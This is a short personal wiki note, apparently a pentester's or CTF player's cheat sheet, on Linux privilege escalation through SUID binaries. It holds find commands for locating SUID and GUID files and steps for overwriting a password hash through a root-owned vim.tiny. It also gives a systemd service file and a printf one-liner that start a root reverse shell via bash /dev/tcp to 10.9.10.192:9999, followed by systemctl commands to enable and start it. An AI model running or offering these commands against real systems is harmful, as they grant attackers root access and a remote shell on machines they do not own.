Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-05-13T09:28:11-04:00

====== SUID ======
Created Wednesday 13 May 2020

search for all suid

#Find GUID
find / -perm -g=s -type f 2>/dev/null

#Find SUID
find / -perm -u=s -type f 2>/dev/null


or


 ---find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

if vim.tiny is root access

openssl passwd -1 -salt root password
(copy the output hash open [[/etc/password]] and replace star with new hash)

if systemctl is root access
root.service===
[Unit]
Description=rooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash  -c 'bash    -i   >& [[/dev/tcp/{ip:port}]] 0>&1'
[Install]
WantedBy=multi-user.target




--printf '[Unit]\nDescription=root\n\n[Service]\nType=simple\nUser=root\nExecStart=/bin/bash -c "bash -i >& /dev/tcp/10.9.10.192/9999 0>&1"\n\n[Install]\nWantedBy=multi-user.target\n' > root.service


> systemctl enable /tmp/root.service
> systemctl start root
